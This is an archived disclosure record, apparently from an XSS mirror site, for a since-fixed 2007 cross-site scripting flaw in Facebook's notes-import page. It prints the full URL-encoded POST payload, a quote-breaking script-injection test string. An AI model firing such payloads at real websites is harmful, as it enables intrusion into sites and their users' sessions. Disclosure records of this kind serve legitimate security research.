2nd www.facebook.com cross-site-scripting (XSS) Vulnerability

Advertisements:

Security researcher Hexspirit, has submitted on 06/04/2007 a cross-site-scripting (XSS) vulnerability affecting www.facebook.com, which at the time of submission ranked 22 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/04/2007. It is currently fixed.

Date submitted: 06/04/2007

Date published: 06/04/2007

Date fixed: 17/07/2007

Status:

FIXED

Author: Hexspirit

Domain: www.facebook.com

Category: XSS

Pagerank: 22

URL: http://www.facebook.com/editnotes.php

POST: blog_url=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCha rCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3 Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ea lert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&xfeed_action=import&user_agreement=1

Click here to view the mirror

XSS Attacks
Cross Site Scripting Exploits and Defense

Website Fraud Loss Prevention